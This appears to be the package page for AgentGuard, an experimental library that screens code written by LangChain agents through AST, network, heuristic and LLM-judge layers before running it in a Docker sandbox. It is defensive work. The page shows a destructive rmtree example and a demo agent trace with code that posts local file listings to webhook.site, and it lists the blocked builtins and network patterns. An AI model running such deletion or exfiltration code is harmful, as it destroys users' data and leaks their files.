๐ก๏ธ AgentGuard
Experimental security guardrails for LangChain agent code execution.
[!WARNING] Alpha / Proof of Concept โ This project is an experimental research tool, not a production-grade security boundary. Code execution is isolated in a Docker container with restrictive defaults, but see known limitations. Use it as an additional layer of defense, not as your only one.
๐ค The Problem
Modern LangChain agents can generate and execute Python code autonomously. A single malicious prompt or hallucination can lead an agent to generate destructive code:
# An agent asked to "clean up temp files" might generate:
import os
import shutil
shutil.rmtree("/var/data/users") # ๐ Oops.
There is no native guardrail in LangChain to prevent this. AgentGuard adds pre-execution filters to catch obvious dangerous patterns before they run.
โ What It Does
AgentGuard wraps your agent's code execution tool in a 3-layer validation pipeline. Before any LLM-generated code runs, it must pass through all three layers:
flowchart TD
A["๐ค LLM Agent generates code"] --> B{"๐ Layer 1: AST Validator"}
B -->|"โ
Pass"| C{"๐ Layer 2: Network Filter"}
B -->|"โ Blocked"| E["๐ก๏ธ SecurityBlockedError\nโ Agent self-corrects"]
C -->|"โ
Pass"| D{"๐ง Layer 3: Semantic Judge"}
C -->|"โ Blocked"| E
D -->|"โ
SAFE"| F["๐ณ Docker Sandbox\nโ Result back to Agent"]
D -->|"โ UNSAFE"| E
style A fill:#4a9eff,color:#fff
style B fill:#ff9f43,color:#fff
style C fill:#ff9f43,color:#fff
style D fill:#ff9f43,color:#fff
style E fill:#ee5a24,color:#fff
style F fill:#2ed573,color:#fff
If any layer blocks the code, the agent receives a descriptive error message and can self-correct โ instead of crashing or failing silently.
๐ก๏ธ How It Works in Action
> Entering new AgentExecutor chain...
Thought: I need to read the local files and send them to a webhook.
Action: safe_python_repl
Action Input:
import os
import requests
files = os.listdir('.')
requests.post('https://webhook.site/test', json={"files": files})
Observation: [AgentGuard | AST Validator] ๐ด BLOCKED โ Forbidden import
detected: 'os'. Rewrite the code without the forbidden operation.
Thought: I am not allowed to use the 'os' module. I cannot fulfill this
request as it requires system access.
Final Answer: ๐ I am restricted from accessing the local file system or
sending data to external webhooks due to security policies.
๐ Quick Start
pip install securellm-agentguard
from agentguard import SafePythonREPLTool, SecurityPolicy
# Define your security rules
policy = SecurityPolicy(
allowed_modules=["pandas", "json", "math"],
allowed_domains=["api.github.com"],
use_semantic_judge=False, # Set True + pass judge_llm for Layer 3
)
safe_repl = SafePythonREPLTool(policy=policy)
# Use it in your LangChain agent instead of PythonREPLTool
# agent = create_react_agent(llm=your_llm, tools=[safe_repl])
With Layer 3 (optional โ any LangChain-compatible LLM):
from langchain_google_genai import ChatGoogleGenerativeAI # or ChatOpenAI, ChatAnthropic, etc.
judge_llm = ChatGoogleGenerativeAI(model="gemini-2.0-flash")
safe_repl = SafePythonREPLTool(policy=policy, judge_llm=judge_llm)
Note: Layer 3 works with any
BaseChatModelโ Gemini, GPT-4, Claude, Mistral, Ollama, etc.
๐ฅ๏ธ Live Web Demo
AgentGuard comes with a built-in FastAPI dashboard to visually test security policies against malicious code in real-time.
# Ensure dev dependencies are installed
poetry install --with dev
# Export your API key for the Semantic Judge (Layer 3)
export GEMINI_API_KEY="your_api_key_here"
# Start the dashboard
poetry run uvicorn demo.app:app
Then open http://localhost:8000 in your browser.
โ๏ธ SecurityPolicy Options
| Parameter | Type | Default | Description |
|---|---|---|---|
allowed_modules |
list[str] |
["math", "json", ...] |
Whitelisted Python modules |
allowed_domains |
list[str] |
[] (block all) |
Whitelisted network domains |
use_semantic_judge |
bool |
True |
Enable LLM semantic analysis |
execution_timeout |
int |
10 |
Max execution seconds |
๐ Security Layers in Detail
Layer 1 โ AST Static Validator
Uses Python's native ast module to parse the code without executing it.
Blocks:
- Any
importnot explicitly whitelisted inallowed_modules from X import Ystyle imports of non-whitelisted modules- Dangerous built-in calls:
exec,eval,compile,open,__import__ - Common escape vectors:
getattr,setattr,delattr,globals,locals
Speed: ~0.1ms โ no I/O, no network, pure AST traversal.
Layer 2 โ Network Filter
Uses regex patterns to detect outbound network calls and validates target domains against the whitelist.
Detects:
requests.get/post/put/delete/patch/headhttpxandaiohttpcallsurllib.request.urlopenandurlretrieve- Raw
socket.connect()calls - Bare URL literals (
https://...)
Note: This is a heuristic regex-based filter, not an OS-level network control. Sophisticated obfuscation may evade it โ Layer 3 exists to catch what Layers 1 & 2 miss.
Layer 2.5 โ Heuristic Triage (Fast Triage)
A fast, regex-based heuristic scanner that calculates a suspicion score for the code. It looks for sensitive keywords (password, token, etc.) and risky operations.
If the score is 0 (completely benign code), this layer bypasses the LLM Judge entirely, drastically reducing latency and API costs. This behavior is enabled by default via triage_skip_llm.
Layer 3 โ Semantic Judge (LLM)
For subtle attacks that evade static analysis (e.g. a loop that deletes files one-by-one), the code is sent to a fast LLM (e.g. gemini-2.0-flash) with a strict binary prompt.
Session-Level Context: The judge receives the agent's recent execution history, allowing it to detect multi-step escalation attacks.
Verdict: Only code classified as SAFE passes. Anything else (including ambiguous responses) is blocked โ fail-closed by design.
Note: The LLM judge is a probabilistic defense โ it can be wrong. It also sends code to a third-party API. Use it as an additional signal, not as a guarantee.
Docker Sandbox Execution (v0.2)
Code that passes all 3 layers runs in a short-lived Docker container with restrictive defaults:
- No network โ
--network none - Read-only filesystem โ
--read-onlywith a small writable/tmp - Non-root user โ runs as
nobody(UID 65534) - All capabilities dropped โ
--cap-drop ALL,--security-opt no-new-privileges - Resource limits โ configurable CPU, memory, PID, and output-size caps
- Fail-closed โ if Docker is unavailable, execution is refused (no fallback to in-process
exec()) - Killable timeout โ the container is forcibly terminated on timeout
Requirement: Docker must be installed and running. Install it from docker.com.
๐ Audit Trail
AgentGuard can log every execution decision as a structured JSON event โ useful for compliance, debugging, and security monitoring.
from agentguard import SafePythonREPLTool, SecurityPolicy, AuditLogger, JsonFileHandler
# Log to a JSONL file (one JSON object per line)
audit = AuditLogger(handlers=[JsonFileHandler("agentguard.log")])
tool = SafePythonREPLTool(policy=SecurityPolicy(), audit=audit)
Each event records:
- Verdict โ
ALLOWED,BLOCKED,TIMEOUT,ERROR, orSANDBOX_UNAVAILABLE - Blocking layer โ which layer blocked the code (
ASTValidator,NetworkFilter,SemanticJudge) - Timing โ wall-clock execution time in milliseconds
- Session ID โ groups events from the same tool instance
- Policy hash โ fingerprint of the active security policy
Built-in handlers: JsonFileHandler (JSONL file), StdoutHandler (stderr), CallbackHandler (custom function for webhooks/SIEM).
Zero overhead when disabled โ if you don't pass an audit parameter, nothing happens.
โ ๏ธ Known Limitations
This is an alpha-stage research project. The following limitations are known:
| Limitation | Detail |
|---|---|
| Docker is required | Code execution requires a running Docker daemon. The sandbox fails closed if Docker is unavailable. |
| Regex-based network filter | The network filter is heuristic. Obfuscated URLs or dynamically-constructed network calls will not be caught by Layer 2. |
| LLM judge is probabilistic | The semantic judge can be wrong, manipulated, or bypassed. It also sends code to a third-party API. |
| Image trust | The default image is python:3.11-alpine. Production deployments should pin to a reviewed digest. |
๐ Project Structure
agentguard/
โโโ agentguard/
โ โโโ __init__.py # Public API exports
โ โโโ policy.py # SecurityPolicy (Pydantic model)
โ โโโ audit.py # Structured Audit Trail logger
โ โโโ exceptions.py # SecurityBlockedError
โ โโโ sandbox.py # DockerSandboxExecutor (v0.2)
โ โโโ validators/
โ โ โโโ ast_validator.py # Layer 1: Static AST analysis
โ โ โโโ network_filter.py # Layer 2: Network domain filter
โ โ โโโ heuristic_triage.py # Layer 2.5: Fast triage to skip LLM
โ โโโ judges/
โ โ โโโ gemini_judge.py # Layer 3: LLM semantic judge (context-aware)
โ โโโ tools/
โ โโโ langchain_tool.py # SafePythonREPLTool (LangChain BaseTool)
โโโ benchmarks/
โ โโโ runner.py # Adversarial benchmark runner
โ โโโ suite.py # 40 attack cases across 8 categories
โโโ tests/ # Pytest suite + Docker integration tests
โโโ examples/
โ โโโ basic_agent.py # Simple agent + AgentGuard demo
โ โโโ threat_intel_demo.py # Threat analysis agent demo
โโโ pyproject.toml # Poetry config + metadata
โโโ .github/workflows/ci.yml # GitHub Actions CI
โโโ README.md
๐บ๏ธ Roadmap
- 3-layer validation pipeline (AST + Network + Semantic Judge)
- LangChain
BaseToolintegration - Timeout enforcement
- GitHub Actions CI
- PyPI Publication โ
pip install securellm-agentguard - Live Web App / Dashboard โ a static browser app to visually test AgentGuard policies
- Visual Demo โ animated GIF showing AgentGuard blocking and auto-correcting in real-time
- Docker Sandbox Isolation (v0.2) โ fail-closed container execution with no network, read-only FS, non-root, resource limits
- Domain allowlist hardening โ fixed suffix-matching vulnerability
- CLI Support โ run AgentGuard locally on Python scripts (e.g.,
agentguard check script.py) - Adversarial Test Suite โ sandbox escape tests, obfuscation tests, resource abuse tests
- Logging & Audit Trail โ structured logs of every blocked/allowed execution
- Plugin System โ custom validator layers via a simple interface
- LangSmith Integration โ trace security events in LangSmith
๐ค Contributing
Contributions are welcome! Please read CONTRIBUTING.md first.
๐ Security
Found a vulnerability? Please read SECURITY.md for responsible disclosure instructions.
๐ License
MIT โ see LICENSE.
Built by Thomas LEON ยท Emerging Technologies & Threat Intelligence
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file securellm_agentguard-0.3.0.tar.gz.
File metadata
- Download URL: securellm_agentguard-0.3.0.tar.gz
- Upload date:
- Size: 23.9 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/7.0.0 CPython/3.13.14
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
17ea36fa3d3315ba093fe1bb61794f246c20fa088b6133cb51560de4220485dd
|
|
| MD5 |
ba862e3dac151e360693dbf77f4617cb
|
|
| BLAKE2b-256 |
b656ce9e616afddbb83e44dadc7256da8f2d67ac86b4679883b03f01e8896138
|
Provenance
The following attestation bundles were made for securellm_agentguard-0.3.0.tar.gz:
Publisher:
publish.yml on Thomas-LEON/agentguard
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
securellm_agentguard-0.3.0.tar.gz -
Subject digest:
17ea36fa3d3315ba093fe1bb61794f246c20fa088b6133cb51560de4220485dd - Sigstore transparency entry: 2340737561
- Sigstore integration time:
-
Permalink:
Thomas-LEON/agentguard@4c49fa8e395f3e83466ff561703ae577d5ded472 -
Branch / Tag:
refs/tags/v0.3.0 - Owner: https://github.com/Thomas-LEON
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@4c49fa8e395f3e83466ff561703ae577d5ded472 -
Trigger Event:
release
-
Statement type:
File details
Details for the file securellm_agentguard-0.3.0-py3-none-any.whl.
File metadata
- Download URL: securellm_agentguard-0.3.0-py3-none-any.whl
- Upload date:
- Size: 24.7 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/7.0.0 CPython/3.13.14
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
9af064279d88aec5ef811504d76be88076b66b34f14264db64f91748bf2877a7
|
|
| MD5 |
c9d6ad98f104c1bc028041b6043a5b31
|
|
| BLAKE2b-256 |
dae4533e09c250d85c092e58799d4e6ecf2ce88d2ace16d60d37d7363f7c689e
|
Provenance
The following attestation bundles were made for securellm_agentguard-0.3.0-py3-none-any.whl:
Publisher:
publish.yml on Thomas-LEON/agentguard
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
securellm_agentguard-0.3.0-py3-none-any.whl -
Subject digest:
9af064279d88aec5ef811504d76be88076b66b34f14264db64f91748bf2877a7 - Sigstore transparency entry: 2340737582
- Sigstore integration time:
-
Permalink:
Thomas-LEON/agentguard@4c49fa8e395f3e83466ff561703ae577d5ded472 -
Branch / Tag:
refs/tags/v0.3.0 - Owner: https://github.com/Thomas-LEON
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
publish.yml@4c49fa8e395f3e83466ff561703ae577d5ded472 -
Trigger Event:
release
-
Statement type: